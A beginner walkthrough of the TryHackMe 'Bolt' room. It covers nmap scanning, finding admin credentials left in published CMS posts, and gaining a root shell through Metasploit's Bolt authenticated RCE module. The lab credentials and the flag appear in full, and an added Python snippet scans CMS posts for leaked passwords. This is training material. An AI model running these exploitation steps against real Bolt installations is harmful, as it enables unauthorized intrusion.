
BOLT - A hero is unleashed [THM] Walkthrough.

Hello,


OK, so here is my walkthrough of the TryHackMe room known as Bolt.

It is a beginner-friendly, CMS-based machine with a Remote Code Execution vulnerability. Come, let's do this together.

First things first, find the machine on TryHackMe named Bolt - A hero unleashed.

Connect to the TryHackMe VPN server using your configuration file (<username>.ovpn). Here is the reference command in case you need it.

	root@root:# openvpn <username>.ovpn

Also, deploy your machine from task 1 of the room and get its IP address.

Information gathering:

Use this <ip> to run an Nmap scan and find which ports are open.

	root@root:# nmap -A <ip>

OK, so three ports are open:

22-SSH(OpenSSH)   |   80 (HTTP-Apache)    |   8000 (HTTP-PHP 7.2.32-1)

Since port 80 is open, I tried opening it in the web browser at <ip>:80

Ahhh... nothing interesting, just the default page of the Ubuntu Apache 2 server.

Then, as port 8000 also runs an HTTP service, I tried port 8000 at <ip>:8000

And got this Bolt CMS page.

Aha! A blue screen, but not of Death (BSOD); instead, it's a hit.


OK, it's time to wander around the site (do it yourself).

While wandering, you will come across these two pages.

One has a note by the admin itself, saying that here is the password in case you need help; they forgot to remove it before production.

The second page contains the username for that. How lucky I am.

Meanwhile, we got two answers as well.

These two show the username and password.
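From the defender's side, the admin's leftover note is the root cause here, and a pre-publish check over public CMS entries would have caught it. The following is an added example, not code from the room or from Bolt; the record fields (`title`, `status`, `body`), the phrase patterns and the sample posts are constructed assumptions.

```python
import re
from html import unescape

# Constructed sample entries (hypothetical fields and values, not the room's real text).
SAMPLE_POSTS = [
    {"title": "Message from admin", "status": "published",
     "body": "<p>Hey IT, in case you forgot, the password is <b>Examp1e-Pa55</b>.</p>"},
    {"title": "Message for IT department", "status": "published",
     "body": "<p>Reminder for IT &amp; support: my username is <em>exampleadmin</em>.</p>"},
    {"title": "Welcome", "status": "published",
     "body": "<p>A password is required to comment on this site.</p>"},
    {"title": "Old note", "status": "draft",
     "body": "<p>password: Dr4ft-0nly</p>"},
]

# Matches "<kind> is <value>", "<kind>: <value>" or "<kind>=<value>".
LEAK_RE = re.compile(
    r"\b(?P<kind>password|passwd|username|login)\b"
    r"(?:\s+(?:is|was)\s+|\s*[:=]\s*)"
    r"(?P<value>[^\s,;]{4,})",
    re.IGNORECASE,
)
STOPWORDS = {"required", "incorrect", "invalid", "wrong", "optional"}

def looks_secret(kind, value):
    if value.lower() in STOPWORDS:
        return False
    if kind.startswith("pass"):
        # A purely alphabetic word after "password is" is usually prose.
        return any(not c.isalpha() for c in value)
    return True

def redact(value):
    return value[0] + "*" * (len(value) - 1)  # the report must not leak it again

def find_credential_leaks(posts):
    findings = []
    for post in posts:
        if post["status"] != "published":  # only public content is checked here
            continue
        text = unescape(re.sub(r"<[^>]+>", " ", post["body"]))
        for m in LEAK_RE.finditer(text):
            kind = m.group("kind").lower()
            value = m.group("value").rstrip(".!?)")
            if value and looks_secret(kind, value):
                findings.append((post["title"], kind, redact(value)))
    return findings

if __name__ == "__main__":
    for title, kind, masked in find_credential_leaks(SAMPLE_POSTS):
        print(f"{title!r}: possible {kind} disclosed ({masked})")
```

Hits are candidates for human review before an entry goes live; any credential that was ever published should be rotated, not just deleted from the page.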

We now have the answer to the question, but where is the question (login_page)?

So, to find the question to my answers (sarcastic), we need to google the location of the default login page in Bolt CMS. I ended up with this documentation manual on their official site.

According to the documentation, we'll get the login page at www.yourdomain.com/bolt/login

So put it into our room address URL, <ip>:8000/bolt/login, and get this login page.

Now more information gathering:

OK, admin dashboard, lovely!

Wait! What's that in the bottom-left corner? Hello, little version number of Bolt CMS (Bolt 3.7.1).

Now we need to exploit this. To do so we need an exploit, so search Google, or any other exploit database, for Bolt CMS 3.7.1, and we will get this exploit for the older version 3.7.0.

Here we go with the next answer to the task. Here is the exploit we are going to use, since it looks promising by name.


Attacking:

Now let's fire up Metasploit; it's time to attack.

Search for "bolt" to find the exploit. The second exploit in the results is the one we are going to use.

Select it with use <path>:

	msf6> use exploit/unix/webapp/bolt_authenticated_rce

Now check the options with:

	msf(unix/webapp/bolt_authenticated_rce)> show options

Now set a few attributes of our exploit. To find <yourip>, use the ifconfig command in Linux and look at the tun0 interface.

	> set lhost <yourip>
	> set rhost <room ip>
	> set username bolt
	> set password boltadmin123
	> run

Voilà! We got the shell.

	id

Booyah! We have root access, and now we need to crawl through the system to get the flag.

	pwd

We are in /home/bolt/public/files, so move to /home.

	cd /home

List the files; the flag file is here.

	ls

Don't wait, just cat it,

because Bolt hates cats😹.

	cat flag.txt

THM{wh0_d035nt_l0ve5_b0l7_r1gh7?}

And here you go, you have exploited the machine, got a flag and ...

BOLT- A hero back in leash

